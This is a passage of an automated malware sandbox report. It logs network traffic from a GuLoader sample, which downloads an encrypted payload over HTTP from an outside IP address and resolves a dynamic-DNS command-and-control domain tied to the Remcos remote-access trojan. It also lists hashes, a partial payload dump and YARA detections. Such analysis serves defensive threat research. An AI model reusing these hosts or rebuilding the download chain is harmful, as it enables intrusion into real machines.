            Aug 2, 2021 21:20:12.031961918 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.032012939 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.032052040 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.032087088 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.032133102 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.032175064 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.032187939 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:12.032213926 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.032252073 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.032286882 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:12.032289028 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.032325029 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.032330036 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:12.032361984 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.032397985 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.032399893 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:12.032444954 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.032464027 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:12.032486916 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.032524109 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.032557011 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:12.032562971 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.032624006 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:12.032658100 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:12.081442118 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.081500053 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.081535101 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.081583023 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.081641912 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.081681013 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.081718922 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.081748009 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.081794024 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.081836939 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.081873894 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.081877947 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:12.081912994 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.081940889 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:12.081974983 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.081983089 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:12.082003117 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.082041025 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.082042933 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:12.082077026 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.082120895 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.082134008 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:12.082158089 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.082212925 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.082220078 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:12.082268000 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.082281113 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:12.082305908 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.082351923 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.082366943 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:12.082396030 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.082431078 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.082448959 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:12.082468033 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.082504034 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.082519054 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:12.082537889 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.082575083 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.082577944 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:12.082609892 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.082634926 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:12.082655907 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.082696915 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.082730055 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:12.082731962 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.082849026 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:12.131598949 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.131665945 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.131710052 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.131747961 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:12.131787062 CEST8049766101.99.94.119192.168.2.4

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Aug 2, 2021 21:17:01.393048048 CEST4971453192.168.2.48.8.8.8
            Aug 2, 2021 21:17:01.420507908 CEST53497148.8.8.8192.168.2.4
            Aug 2, 2021 21:17:02.722836018 CEST5802853192.168.2.48.8.8.8
            Aug 2, 2021 21:17:02.750277042 CEST53580288.8.8.8192.168.2.4
            Aug 2, 2021 21:17:04.696264982 CEST5309753192.168.2.48.8.8.8
            Aug 2, 2021 21:17:04.720990896 CEST53530978.8.8.8192.168.2.4
            Aug 2, 2021 21:17:05.761957884 CEST4925753192.168.2.48.8.8.8
            Aug 2, 2021 21:17:05.789669991 CEST53492578.8.8.8192.168.2.4
            Aug 2, 2021 21:17:06.840415955 CEST6238953192.168.2.48.8.8.8
            Aug 2, 2021 21:17:06.866498947 CEST53623898.8.8.8192.168.2.4
            Aug 2, 2021 21:17:08.514224052 CEST4991053192.168.2.48.8.8.8
            Aug 2, 2021 21:17:08.546753883 CEST53499108.8.8.8192.168.2.4
            Aug 2, 2021 21:17:09.595941067 CEST5585453192.168.2.48.8.8.8
            Aug 2, 2021 21:17:09.623547077 CEST53558548.8.8.8192.168.2.4
            Aug 2, 2021 21:17:10.547267914 CEST6454953192.168.2.48.8.8.8
            Aug 2, 2021 21:17:10.574770927 CEST53645498.8.8.8192.168.2.4
            Aug 2, 2021 21:17:11.647775888 CEST6315353192.168.2.48.8.8.8
            Aug 2, 2021 21:17:11.675528049 CEST53631538.8.8.8192.168.2.4
            Aug 2, 2021 21:17:12.845449924 CEST5299153192.168.2.48.8.8.8
            Aug 2, 2021 21:17:12.878277063 CEST53529918.8.8.8192.168.2.4
            Aug 2, 2021 21:17:13.870208979 CEST5370053192.168.2.48.8.8.8
            Aug 2, 2021 21:17:13.904135942 CEST53537008.8.8.8192.168.2.4
            Aug 2, 2021 21:17:14.987005949 CEST5172653192.168.2.48.8.8.8
            Aug 2, 2021 21:17:15.019890070 CEST53517268.8.8.8192.168.2.4
            Aug 2, 2021 21:17:16.020144939 CEST5679453192.168.2.48.8.8.8
            Aug 2, 2021 21:17:16.047681093 CEST53567948.8.8.8192.168.2.4
            Aug 2, 2021 21:17:17.078398943 CEST5653453192.168.2.48.8.8.8
            Aug 2, 2021 21:17:17.111186981 CEST53565348.8.8.8192.168.2.4
            Aug 2, 2021 21:17:18.109400988 CEST5662753192.168.2.48.8.8.8
            Aug 2, 2021 21:17:18.141968012 CEST53566278.8.8.8192.168.2.4
            Aug 2, 2021 21:17:19.095261097 CEST5662153192.168.2.48.8.8.8
            Aug 2, 2021 21:17:19.120047092 CEST53566218.8.8.8192.168.2.4
            Aug 2, 2021 21:17:20.116214991 CEST6311653192.168.2.48.8.8.8
            Aug 2, 2021 21:17:20.151633024 CEST53631168.8.8.8192.168.2.4
            Aug 2, 2021 21:17:21.170927048 CEST6407853192.168.2.48.8.8.8
            Aug 2, 2021 21:17:21.206410885 CEST53640788.8.8.8192.168.2.4
            Aug 2, 2021 21:17:31.180922031 CEST6480153192.168.2.48.8.8.8
            Aug 2, 2021 21:17:31.222162962 CEST53648018.8.8.8192.168.2.4
            Aug 2, 2021 21:17:45.923132896 CEST6172153192.168.2.48.8.8.8
            Aug 2, 2021 21:17:45.982989073 CEST53617218.8.8.8192.168.2.4
            Aug 2, 2021 21:17:46.522591114 CEST5125553192.168.2.48.8.8.8
            Aug 2, 2021 21:17:46.555643082 CEST53512558.8.8.8192.168.2.4
            Aug 2, 2021 21:17:47.145872116 CEST6152253192.168.2.48.8.8.8
            Aug 2, 2021 21:17:47.181860924 CEST53615228.8.8.8192.168.2.4
            Aug 2, 2021 21:17:47.704446077 CEST5233753192.168.2.48.8.8.8
            Aug 2, 2021 21:17:47.746491909 CEST53523378.8.8.8192.168.2.4
            Aug 2, 2021 21:17:48.197175026 CEST5504653192.168.2.48.8.8.8
            Aug 2, 2021 21:17:48.231225967 CEST53550468.8.8.8192.168.2.4
            Aug 2, 2021 21:17:48.602571011 CEST4961253192.168.2.48.8.8.8
            Aug 2, 2021 21:17:48.630182981 CEST53496128.8.8.8192.168.2.4
            Aug 2, 2021 21:17:48.787736893 CEST4928553192.168.2.48.8.8.8
            Aug 2, 2021 21:17:48.829253912 CEST53492858.8.8.8192.168.2.4
            Aug 2, 2021 21:17:49.046789885 CEST5060153192.168.2.48.8.8.8
            Aug 2, 2021 21:17:49.079457045 CEST53506018.8.8.8192.168.2.4
            Aug 2, 2021 21:17:49.693171978 CEST6087553192.168.2.48.8.8.8
            Aug 2, 2021 21:17:49.725912094 CEST53608758.8.8.8192.168.2.4
            Aug 2, 2021 21:17:50.854691029 CEST5644853192.168.2.48.8.8.8
            Aug 2, 2021 21:17:50.887387037 CEST53564488.8.8.8192.168.2.4
            Aug 2, 2021 21:17:51.457587004 CEST5917253192.168.2.48.8.8.8
            Aug 2, 2021 21:17:51.492850065 CEST53591728.8.8.8192.168.2.4
            Aug 2, 2021 21:18:06.299632072 CEST6242053192.168.2.48.8.8.8
            Aug 2, 2021 21:18:06.332312107 CEST53624208.8.8.8192.168.2.4
            Aug 2, 2021 21:18:06.416522026 CEST6057953192.168.2.48.8.8.8
            Aug 2, 2021 21:18:06.462497950 CEST53605798.8.8.8192.168.2.4
            Aug 2, 2021 21:18:12.731527090 CEST5018353192.168.2.48.8.8.8
            Aug 2, 2021 21:18:12.772198915 CEST53501838.8.8.8192.168.2.4
            Aug 2, 2021 21:18:41.353856087 CEST6153153192.168.2.48.8.8.8
            Aug 2, 2021 21:18:41.389388084 CEST53615318.8.8.8192.168.2.4
            Aug 2, 2021 21:18:43.933024883 CEST4922853192.168.2.48.8.8.8
            Aug 2, 2021 21:18:43.965635061 CEST53492288.8.8.8192.168.2.4
            Aug 2, 2021 21:20:14.137607098 CEST5979453192.168.2.48.8.8.8
            Aug 2, 2021 21:20:14.180700064 CEST53597948.8.8.8192.168.2.4
            Aug 2, 2021 21:21:56.173140049 CEST5591653192.168.2.48.8.8.8
            Aug 2, 2021 21:21:56.208565950 CEST53559168.8.8.8192.168.2.4
            Aug 2, 2021 21:21:56.346127033 CEST5275253192.168.2.48.8.8.8
            Aug 2, 2021 21:21:56.371498108 CEST53527528.8.8.8192.168.2.4
            Aug 2, 2021 21:21:56.724428892 CEST6054253192.168.2.48.8.8.8
            Aug 2, 2021 21:21:56.757277012 CEST53605428.8.8.8192.168.2.4
            Aug 2, 2021 21:21:59.849406958 CEST6068953192.168.2.48.8.8.8
            Aug 2, 2021 21:21:59.884716034 CEST53606898.8.8.8192.168.2.4
            Aug 2, 2021 21:22:02.763622046 CEST6420653192.168.2.48.8.8.8
            Aug 2, 2021 21:22:02.810947895 CEST53642068.8.8.8192.168.2.4
            Aug 2, 2021 21:22:03.106690884 CEST5090453192.168.2.48.8.8.8
            Aug 2, 2021 21:22:03.159214020 CEST53509048.8.8.8192.168.2.4
            Aug 2, 2021 21:24:13.843344927 CEST5752553192.168.2.48.8.8.8
            Aug 2, 2021 21:24:13.894480944 CEST53575258.8.8.8192.168.2.4

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
            Aug 2, 2021 21:20:14.137607098 CEST192.168.2.48.8.8.80xacfStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
            Aug 2, 2021 21:20:14.180700064 CEST8.8.8.8192.168.2.40xacfNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
            Aug 2, 2021 21:21:56.208565950 CEST8.8.8.8192.168.2.40xdf4dNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)

            HTTP Request Dependency Graph

            • 101.99.94.119

            HTTP Packets

            Session IDSource IPSource PortDestination IPDestination PortProcess
            0192.168.2.449766101.99.94.11980C:\Users\user\Desktop\LzbZ4T1iV8.exe
            TimestampkBytes transferredDirectionData
            Aug 2, 2021 21:20:11.882945061 CEST6581OUTGET /WEALTH_PRUuqVZw139.bin HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Host: 101.99.94.119
            Cache-Control: no-cache
            Aug 2, 2021 21:20:11.932694912 CEST6582INHTTP/1.1 200 OK
            Date: Mon, 02 Aug 2021 11:20:11 GMT
            Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
            Last-Modified: Sun, 01 Aug 2021 22:14:12 GMT
            ETag: "72840-5c886c5bd2c84"
            Accept-Ranges: bytes
            Content-Length: 469056
            Content-Type: application/octet-stream
            Data Raw: 02 da 3f 3b 14 7d 1a 6a 97 49 3f 94 5c 82 37 c8 0c ca ec 44 1c 6d c0 32 59 f9 cf d2 b0 1a e7 13 99 e0 d4 67 ec d8 64 6e 95 58 ec b1 4f 94 7f 92 37 39 35 25 0e 6c f3 89 78 b7 14 89 1a b4 26 f2 11 bc 3c b1 1c 0b fb d6 41 4d 17 b6 90 e4 e1 56 be d4 42 8e 30 56 42 72 02 40 cf 5a 21 29 62 b6 a4 bb 97 62 c7 e2 1d 15 12 0a 25 a3 bb 05 00 9a 03 47 1d ba da 59 7d 50 7d 8e 32 9f bd 1b 63 b0 ea 7e de 40 f0 aa 58 0e 19 69 40 f1 d1 6b f1 62 d6 9c 56 99 d3 55 3a 4c c8 f3 2a 1b 7f 98 48 43 5b 6b 10 cc 6e ca 2c 4f d1 bc 05 59 7c a8 bd 1b e3 26 7b 5f 90 54 72 2d 60 23 c9 eb 7e 5d ec e2 0a 13 8d ba 86 2d 25 4e 20 56 e0 c4 56 b4 da 8c f9 40 35 ce ca 47 61 c1 d5 42 39 36 83 4b 05 13 8e 82 3a 7f 1a 70 78 d3 98 05 7d 70 85 8a 7a b4 55 f9 32 c4 64 02 aa 76 81 23 0d 67 b4 0c 86 01 3c 66 fe 8e 3d 81 d4 a9 fd 53 2d 87 b2 0a 8c 47 cb 99 07 35 0a ea 05 95 85 9a ea 9e 1c b4 42 7b 37 c3 bf 5b d5 08 31 4c 06 8c ae 2a dc 74 43 76 6b 1a 79 74 62 a4 ec 7a e4 b3 33 61 bb 8c f9 8d 24 71 d9 a7 31 0b f7 dd 8d a2 30 60 0f 5d 6b ca 63 ff f3 ad e7 ae 9c 70 5d ab fb cf ab d5 2a 9c 0b c8 8a 06 7a 9e 24 c7 88 e1 fc 5f 55 5d a2 fe e4 58 1e af 6c 38 09 9d 79 ed 0d 1e d1 9b 13 ef bb dd e2 65 05 71 fa 7e 26 bb f5 c9 72 29 42 3c 09 d8 c6 58 89 d2 04 93 17 fc f9 4a ff 0c 29 bd d9 81 ba cb e4 1b 2c 52 78 a4 d9 42 8a 61 95 7c 3e 9a 70 61 f5 c7 73 cf af 4a 80 27 ac 59 a8 a5 a9 49 8b 4d 5f 3c 72 be c5 73 21 12 da 76 7f ba 44 c5 a7 66 6a 8f 02 0d 2c 51 87 6a c1 50 3a 55 43 c6 41 a6 d1 bb 6d db 6f 22 5f 49 7b bc 5d 82 66 82 4b a4 3c d9 82 27 47 0b f0 a6 2a 48 ec 52 1e 40 e4 cc 10 e5 b4 02 68 d3 1c 3b 3c 99 33 d9 13 b9 61 55 a3 8e da ce 48 88 c3 28 d8 13 34 45 1f df b3 20 66 a5 15 3a 2d 26 dc 96 c9 67 30 5c ca 63 b9 34 86 eb 7a fc ff c3 26 06 89 06 ca a1 12 4b 9d f9 57 a7 54 49 70 0a 52 77 83 b6 e9 02 f2 6c 48 f9 74 79 d9 82 16 96 89 9a 7a de b4 90 0f f6 16 6b 07 64 5c 83 16 8f 9d 35 d2 84 8c 59 91 d3 47 b1 2a 4d ad cd 41 07 a6 d3 a3 71 13 43 48 13 55 d1 61 c8 b4 e9 72 ef e4 25 55 23 a3 6c b7 1b 62 c3 ff ed f0 85 26 dc 67 ec 9d b6 82 25 ee ff a9 0b a1 9b 2b e2 53 8e cb 80 d9 08 0e 43 7f ab aa ac e8 48 0c 86 43 08 9d 39 48 04 fc 5a fd cb ff 7f d7 7e 5f cc dd e7 46 9c 10 4c 3d 16 86 e7 3c 91 40 12 5f 01 8e 41 14 23 b5 7b 43 89 4d 4f ad 4f fe 82 56 43 16 6f 60 ec 0e cc 2b 5a f9 2b db 17 89 0a 97 3c 4b 96 7c a4 e1 58 26 05 bd dd b6 55 ab 82 d1 2f 30 a1 29 7c 1d ca aa 24 22 59 fb a1 c2 6e 18 e5 67 5a 05 bf 70 24 a9 54 96 11 ce 4f 01 7c ab 96 38 b4 35 55 08 59 ea ed 23 06 cb 67 22 ff ab ea ab ed 73 ef 40 4f 10 61 66 d5 f0 91 4b 0c 68 4b 13 1b 27 3c 7c 9e cf 12 c2 37 76 5d 5f bc c1 76 8d 4a 87 b9 10 33 69 85 2b e7 99 38 4a d2 a4 a6 09 55 d3 c9 70 5e d8 c0 6d ff 3c fb 56 07 b6 e7 fb 66 8f fb f9 d7 f4 a8 fb 01 0b fa 5c db d2 33 8e 37 1f 9e 99 c1 15 13 ea e1 cd e4 0c 5c e6 ac b1 1f 0b fb d6 45 4d 17 b6 6f 1b e1 56 06 d4 42 8e 30 56 42 72 42 40 cf 5a 21 29 62 b6 a4 bb 97 62 c7 e2 1d 15 12 0a 25 a3 bb 05 00 9a 03 47 1d ba da 59 7d 50 7d 8e 32 9f ad 1a 63 b0 e4 61 64 4e f0 1e 51 c3 38 d1 41 bd 1c 4a a5 0a bf ef 76 e9 a1 3a 5d 3e a9 9e 0a 78 1e f6 26 2c 2f 4b 72 a9 4e b8 59 21 f1 d5 6b 79 38
            Data Ascii: ?;}jI?\7Dm2YgdnXO795%lx&<AMVB0VBr@Z!)bb%GY}P}2c~@Xi@kbVU:L*HC[kn,OY|&{_Tr-`#~]-%N VV@5GaB96K:px}pzU2dv#g<f=S-G5B{7[1L*tCvkytbz3a$q10`]kcp]*z$_U]Xl8yeq~&r)B<XJ),RxBa|>pasJ'YIM_<rs!vDfj,QjP:UCAmo"_I{]fK<'G*HR@h;<3aUH(4E f:-&g0\c4z&KWTIpRwlHtyzkd\5YG*MAqCHUar%U#lb&g%+SCHC9HZ~_FL=<@_A#{CMOOVCo`+Z+<K|X&U/0)|$"YngZp$TO|85UY#g"s@OafKhK'<|7v]_vJ3i+8JUp^m<Vf\37\EMoVB0VBrB@Z!)bb%GY}P}2cadNQ8AJv:]>x&,/KrNY!ky8


            Code Manipulations

            Statistics

            Behavior

            Click to jump to process

            System Behavior

            General

            Start time:21:17:06
            Start date:02/08/2021
            Path:C:\Users\user\Desktop\LzbZ4T1iV8.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\Desktop\LzbZ4T1iV8.exe'
            Imagebase:0x400000
            File size:114688 bytes
            MD5 hash:41E1BC9DE5F3B61639FB88143E933FF8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:Visual Basic
            Yara matches:
            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Author: Joe Security
            Reputation:low

            General

            Start time:21:18:52
            Start date:02/08/2021
            Path:C:\Users\user\Desktop\LzbZ4T1iV8.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\Desktop\LzbZ4T1iV8.exe'
            Imagebase:0x400000
            File size:114688 bytes
            MD5 hash:41E1BC9DE5F3B61639FB88143E933FF8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp, Author: Joe Security
            Reputation:low

            Disassembly

            Code Analysis

            Reset < >